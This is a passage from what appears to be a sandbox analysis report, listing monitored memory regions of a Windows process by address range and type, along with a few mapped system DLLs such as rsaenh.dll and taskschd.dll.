"" Region: id = 3532 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3533 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3534 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3535 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3536 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3537 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3538 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3539 start_va = 0x470000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3540 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3541 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3542 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3543 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3544 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3545 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3546 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3547 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3548 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3549 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3550 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3551 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3552 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3553 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3554 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3555 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3556 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3557 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3558 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3559 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3560 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3561 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3562 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3563 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3564 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3565 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3566 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3567 start_va = 0x470000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3568 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3569 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3570 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3571 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3572 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3573 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3574 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3575 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3576 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3577 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3578 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3579 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3580 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3581 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3582 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3583 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3584 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3585 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3586 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3587 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3588 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3589 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3590 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3591 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3592 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3593 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3594 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3595 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3596 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3597 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3598 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3599 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3600 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3601 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3602 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3603 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3604 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3605 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3606 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3607 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3608 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3609 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3610 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3611 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3612 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3613 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3614 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3615 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3616 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3617 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3618 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3619 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3620 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3621 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3622 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3623 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3624 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3625 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3626 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3627 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3628 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3629 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3630 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3631 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3632 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3633 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3634 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3635 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3636 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3637 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3638 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3639 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3640 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3641 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3642 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3643 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3644 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3645 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3646 start_va = 0x460000 end_va = 0x461fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3647 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 3648 start_va = 0x620000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 3649 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3650 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3651 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 3652 start_va = 0x620000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 3653 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3654 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3655 start_va = 0x470000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3656 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 3657 start_va = 0x620000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 3658 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3659 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3660 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 3661 start_va = 0x620000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 3662 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3663 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3664 start_va = 0x470000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3665 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 3666 start_va = 0x620000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 3667 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3668 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3669 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 3670 start_va = 0x620000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 3671 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3672 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3673 start_va = 0x470000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3674 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 3675 start_va = 0x620000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 3676 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3677 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3678 start_va = 0x470000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3679 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 3680 start_va = 0x620000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 3681 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3682 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3683 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3684 start_va = 0x470000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3685 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 3686 start_va = 0x620000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 3687 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3688 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3689 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 3690 start_va = 0x620000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 3691 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3692 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3693 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3694 start_va = 0x470000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3695 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3696 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3697 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3698 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3699 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3700 start_va = 0x7ffd4c100000 end_va = 0x7ffd4c133fff monitored = 0 entry_point = 0x7ffd4c11ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3701 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3702 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3703 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3704 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3705 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3706 start_va = 0x7ffd368c0000 end_va = 0x7ffd3695bfff monitored = 0 entry_point = 0x7ffd369196a0 region_type = mapped_file name = "efswrt.dll" filename = "\\Windows\\System32\\efswrt.dll" (normalized: "c:\\windows\\system32\\efswrt.dll") Region: id = 3707 start_va = 0x470000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3708 start_va = 0xfd50000 end_va = 0xfdcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fd50000" filename = "" Region: id = 3709 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3710 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3711 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3712 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3713 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3714 start_va = 0x7ffd492b0000 end_va = 0x7ffd4936efff monitored = 0 entry_point = 0x7ffd492d1c50 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 3715 start_va = 0x7ffd493a0000 end_va = 0x7ffd493d5fff monitored = 0 entry_point = 0x7ffd493b0070 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 3716 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3717 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3718 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3719 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3720 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4089 start_va = 0xfdd0000 end_va = 0x102c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fdd0000" filename = "" Region: id = 4090 start_va = 0x460000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4091 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4092 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4093 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = 